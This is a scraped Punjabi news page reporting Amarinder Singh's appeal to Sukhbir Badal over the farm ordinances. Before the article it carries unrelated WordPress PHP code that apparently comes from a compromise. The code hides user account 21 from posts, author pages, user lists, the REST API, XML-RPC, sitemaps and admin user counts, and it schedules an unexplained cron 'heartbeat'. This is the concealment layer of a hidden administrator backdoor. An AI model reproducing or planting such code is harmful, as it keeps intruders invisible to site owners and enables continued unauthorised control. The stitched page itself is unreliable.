add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਅਮਰਿੰਦਰ ਦੀ ਸੁਖਬੀਰ ਨੂੰ ਸਲਾਹ : ਕਿਸਾਨਾਂ ਲਈ ਆਪਣੀ ਅੰਤਰ ਆਤਮਾ ਦੀ ਆਵਾਜ਼ ਸੁਣੋ - Press Ki Taquat
No Result
View All Result
ਚੰਡੀਗੜ•, 28 ਜੂਨ (ਸ਼ਿਵ ਨਾਰਾਇਣ ਜਾਂਗੜਾ) : ਪੰਜਾਬ ਦੇ ਮੁੱਖ ਮੰਤਰੀ ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਨੇ ਭਾਰਤ ਸਰਕਾਰ ਵੱਲੋਂ ਜਾਰੀ ਕੀਤੇ ਖੇਤੀਬਾੜੀ ਸੈਕਟਰ ਦੇ ਆਰਡੀਨੈਂਸਾਂ ਦੇ ਮੁੱਦੇ ਉਤੇ ਸ਼ਨਿਚਰਵਾਰ ਨੂੰ ਸ਼੍ਰੋਮਣੀ ਅਕਾਲੀ ਦਲ ਨੂੰ ਅਪੀਲ ਕੀਤੀ ਕਿ ਉਹ ਆਪਣੀਆਂ ਰਾਜਸੀ ਮਜਬੂਰੀਆਂ ਨੂੰ ਪਾਸੇ ਰੱਖਦੇ ਹੋਏ ਸੂਬੇ ਦੇ ਕਿਸਾਨਾਂ ਦੇ ਵਡਰੇ ਹਿੱਤਾਂ ਲਈ ਆਪਣੀ ਅੰਤਰ ਆਤਮਾ ਦੀ ਆਵਾਜ਼ ਸੁਣਨ।
ਸਰਬ ਪਾਰਟੀ ਮੀਟਿੰਗ ਵਿੱਚ ਅਕਾਲੀਆਂ ਨੂੰ ਕੀਤੀ ਇਹੋ ਅਪੀਲ ਨੂੰ ਯਾਦ ਕਰਵਾਉਂਦਿਆਂ ਮੁੱਖ ਮੰਤਰੀ ਨੇ ਕਿਹਾ ਕਿ ਸ਼੍ਰੋਮਣੀ ਅਕਾਲੀ ਦਲ ਇਨ•ਾਂ ਆਰਡੀਨੈਂਸਾਂ ਦੇ ਗੰਭੀਰ ਪ੍ਰਭਾਵਾਂ ਨੂੰ ਨਹੀਂ ਸਮਝ ਰਿਹਾ ਅਤੇ ਸੂਬੇ ਦੇ ਹਿੱਤਾਂ ਨਾਲੋਂ ਆਪਣੇ ਰਾਜਸੀ ਹਿੱਤਾਂ ਨੂੰ ਪਹਿਲ ਦਿੰਦਾ ਹੋਇਆ ਉਨ•ਾਂ ਨੂੰ ਅੱਗੇ ਰੱਖ ਰਿਹਾ ਹੈ। ਉਨ•ਾਂ ਚਿਤਾਵਨੀ ਦਿੰਦਿਆਂ ਕਿਹਾ ਕਿ ਜੇ ਸ਼੍ਰੋਮਣੀ ਅਕਾਲੀ ਦਲ ਨੇ ਆਪਣੇ ਰਾਜਸੀ ਹਿੱਤਾਂ ਨੂੰ ਇਸੇ ਤਰ•ਾਂ ਅੱਗੇ ਰੱਖੀ ਰੱਖਿਆ ਤਾਂ ਇਹ ਪੰਜਾਬ ਦਾ ਵਿਨਾਸ਼ ਕਰ ਦੇਵੇਗਾ।
ਇਸ ‘ਤੇ ਜ਼ੋਰ ਦਿੰਦਿਆਂ ਕਿ ਜਦੋਂ ਪੰਜਾਬ ਦੇ ਹਿੱਤਾਂ ਦਾ ਮਸਲਾ ਆਵੇ ਉਥੇ ਕੋਈ ਸਿਆਸਤ ਨਹੀਂ ਹੋਣੀ ਚਾਹੀਦੀ, ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਨੇ ਯਾਦ ਕਰਵਾਇਆ ਕਿ ਉਨ•ਾਂ ਮੁੱਖ ਮੰਤਰੀ ਦੇ ਆਪਣੇ ਪਹਿਲੇ ਕਾਰਜਕਾਲ ਦੌਰਾਨ ਪੰਜਾਬ ਦੇ ਪਾਣੀਆਂ ਨੂੰ ਪ੍ਰਸਤਾਵਿਤ ਸਤਲੁਜ ਯਮੁਨਾ ਲਿੰਕ ਨਹਿਰ ਰਾਹੀਂ ਸੂਬੇ ਤੋਂ ਬਾਹਰ ਲਿਜਾਏ ਜਾਣ ਤੋਂ ਬਚਾਉਣ ਲਈ ਗਵਾਂਢੀ ਸੂਬਿਆਂ ਨਾਲ ਸਾਰੇ ਸਮਝੌਤਿਆਂ ਨੂੰ ਰੱਦ ਕਰ ਦਿੱਤਾ ਸੀ। ਉਨ•ਾਂ ਯਾਦ ਕਰਵਾਇਆ ਕਿ ਨਾ ਕੇਵਲ ਉਹ ਇਸ ਮਸਲੇ ‘ਤੇ ਆਪਣੀ ਪਾਰਟੀ ਦੇ ਖਿਲਾਫ ਗਏ ਸਗੋਂ ਇਸ ਕਦਮ ਨਾਲ ਉਨ•ਾਂ ਆਪਣਾ ਭਵਿੱਖ ਦਾਅ ‘ਤੇ ਲਾ ਦਿੱਤਾ ਸੀ। ਉਨ•ਾਂ ਹੋਰ ਕਿਹਾ, ”ਪੰਜਾਬ ਦੇ ਹਿੱਤ ਮੇਰੇ ਲਈ ਸਭ ਤੋਂ ਉੱਪਰ ਹਨ ਅਤੇ ਇਹ ਅਕਾਲੀਆਂ ਲਈ ਵੀ ਹੋਣੇ ਚਾਹੀਦੇ ਹਨ”।
ਇਹ ਦੱਸਦਿਆਂ ਕਿ ਸਵਾਲਾਂ ਦੇ ਘੇਰੇ ਵਿੱਚ ਆਏ ਤਿੰਨੋਂ ਆਰਡੀਨੈਂਸ ਸ਼ਾਂਤਾ ਕੁਮਾਰ ਕਮੇਟੀ ਦੀਆਂ ਸਿਫਾਰਸ਼ਾਂ ‘ਤੇ ਆਧਾਰਿਤ ਹਨ ਜਿਸ ਨੇ ਘੱਟੋ-ਘੱਟ ਸਮਰਥਨ ਮੁੱਲ ਦੇ ਖਾਤਮੇ ਅਤੇ ਐਫ.ਸੀ.ਆਈ. ਨੂੰ ਭੰਗ ਕਰਨ ਦੀ ਵਕਾਲਤ ਕੀਤੀ ਸੀ। ਮੁੱਖ ਮੰਤਰੀ ਨੇ ਆਪਣੇ ਅੱਜ ਦੇ ਫੇਸਬੁੱਕ ਲਾਈਵ ਸੈਸ਼ਨ ਦੌਰਾਨ ਕਿਹਾ ਕਿ ਜੇਕਰ ਇਨ•ਾਂ ਆਰਡੀਨੈਂਸਾਂ ਨੂੰ ਪਾਸ ਹੋਣ ਅਤੇ ਕਾਨੂੰਨੀ ਰੂਪ ਧਾਰਨ ਕਰਨ ਦੀ ਆਗਿਆ ਦਿੱਤੀ ਜਾਂਦੀ ਹੈ ਤਾਂ ਕੇਂਦਰ ਨੂੰ ਸੂਬੇ ਦੇ ਵਿਸ਼ੇ ਖੇਤੀਬਾੜੀ ਅੰਦਰ ਸਾਰੇ ਸਮਿਆਂ ਲਈ ਦਖਲ ਦੇਣ ਲਈ ਹਰੀ ਝੰਡੀ ਮਿਲ ਜਾਵੇਗੀ। ਉਨ•ਾਂ ਕਿਹਾ ਕਿ ਇਸ ਨਾਲ ਭਾਰਤ ਸਰਕਾਰ ਇਸ ਵਿਸ਼ੇ ਬਾਰੇ ਹਰ ਚਾਹਿਆ ਫੈਸਲਾ ਲੈਣ ਲਈ ਅੱਗੇ ਵਧੇਗੀ ਅਤੇ ਸ਼ਾਂਤ ਕੁਮਾਰ ਕਮੇਟੀ ਦੀਆਂ ਸਿਫਾਰਸ਼ਾਂ ਨੂੰ ਅਮਲ ਵਿੱਚ ਲਿਆਉਣ ਲਈ ਵੀ ਅੱਗੇ ਵਧੇਗੀ।
ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਨੇ ਚਿਤਾਵਨੀ ਦਿੱਤੀ ਕਿ ਭਾਵੇਂ ਆਰਡੀਨੈਂਸਾਂ ਵਿੱਚ ਘੱਟੋ-ਘੱਟ ਸਮਰਥਨ ਮੁੱਲ ਵਿਵਸਥਾ ਦਾ ਵਿਸ਼ੇਸ਼ ਰੂਪ ਵਿੱਚ ਜ਼ਿਕਰ ਨਾ ਵੀ ਹੋਵੇ ਤਾਂ ਵੀ ਇਹ ਸਪੱਸ਼ਟ ਹੈ ਕਿ ਇਸ ਨਾਲ ਵਿਵਸਥਾ ਦੇ ਖਾਤਮੇਂ ਦਾ ਮੁੱਢ ਬੱਝੇਗਾ। ਉਨ•ਾਂ ਅੱਗੇ ਕਿਹਾ ਕਿ ਉਨ•ਾਂ ਵੱਲੋਂ ਸਰਬ ਪਾਰਟੀ ਮੀਟਿੰਗ ਕਰਵਾਈ ਗਈ ਸੀ ਤਾਂ ਜੋ ਕੇਂਦਰ ਸਰਕਾਰ ਦੇ ਕਿਸਾਨ ਵਿਰੋਧੀ ਅਤੇ ਪੰਜਾਬ ਵਿਰੋਧੀ ਫੈਸਲਿਆਂ ‘ਤੇ ਸਰਬਸੰਮਤੀ ਬਣਾਈ ਜਾ ਸਕੇ।
ਮੁੱਖ ਮੰਤਰੀ ਨੇ ਇਕ ਵਾਰ ਫਿਰ ਸ਼੍ਰੋਮਣੀ ਅਕਾਲੀ ਦਲ ਦੇ ਪ੍ਰਧਾਨ ਨੂੰ ਪੰਜਾਬ ਦੇ ਨਾਜ਼ੁਕ ਮਸਲਿਆਂ ਨੂੰ ਲੈ ਕੇ ਸਿਆਸਤ ਬੰਦ ਕਰਨ ਅਤੇ ਆਰਡੀਨੈਸਾਂ ਦੇ ਮਾਰੂ ਪ੍ਰਭਾਵ ਤੋਂ ਸੂਬੇ ਦੇ ਕਿਸਾਨਾਂ ਤੇ ਲੋਕਾਂ ਨੂੰ ਬਚਾਉਣ ਲਈ ਪੰਜਾਬ ਸਰਕਾਰ ਦੇ ਨਾਲ ਖੜ•ਨ ਦੀ ਅਪੀਲ ਕੀਤੀ।
ਕੈਪਟਨ ਅਮਰਿੰਦਰ ਸਿੰਘ ਨੇ ਕਿਹਾ ਕਿ ਸਰਬ ਪਾਰਟੀ ਮੀਟਿੰਗ ਦੌਰਾਨ ਅਪਣਾਏ ਮਤੇ ਦੇ ਤਿੰਨ ਪੁਆਇੰਟਾਂ ਵਿੱਚੋਂ ਦੋ ‘ਤੇ ਉਨ•ਾਂ ਦੀ ਪਾਰਟੀ ਦੇ ਸਮਰਥਨ ਤੋਂ ਪਿਛੇ ਹਟਣ ਦੀ ਥਾਂ ਸੁਖਬੀਰ ਨੂੰ ਅਸਲ ਵਿੱਚ ਪੂਰੇ ਮਤੇ ਦੀ ਸੱਚੀ ਤੇ ਸੁੱਚੀ ਭਾਵਨਾ ਨਾਲ ਮੁਕੰਮਲ ਤੇ ਸਪੱਸ਼ਟ ਹਮਾਇਤ ਕਰਨੀ ਚਾਹੀਦੀ ਹੈ। ਇਹ ਆਖਦਿਆਂ ਕਿ ਅਕਾਲੀ ਹਮੇਸ਼ਾ ਸੰਘੀ ਢਾਂਚੇ ਦੀ ਭਾਵਨਾ ਦੇ ਹੱਕ ਵਿੱਚ ਰਹੇ, ਮੁੱਖ ਮੰਤਰੀ ਨੇ ਸੁਖਬੀਰ ਨੂੰ ਪੰਜਾਬ ਸਰਕਾਰ ਦਾ ਸਾਥ ਦੇਣ ਦੀ ਅਪੀਲ ਕੀਤੀ ਤਾਂ ਜੋ ਭਾਰਤੀ ਸੰਵਿਧਾਨ ਵਿੱਚ ਦਰਸਾਏ ਸੰਘੀ ਢਾਂਚੇ ਨੂੰ ਤਬਾਹ ਹੋਣ ਤੋਂ ਬਚਾਉਣ ਨੂੰ ਯਕੀਨੀ ਬਣਾਇਆ ਜਾ ਸਕੇ।
Post Views: 173
No Result
View All Result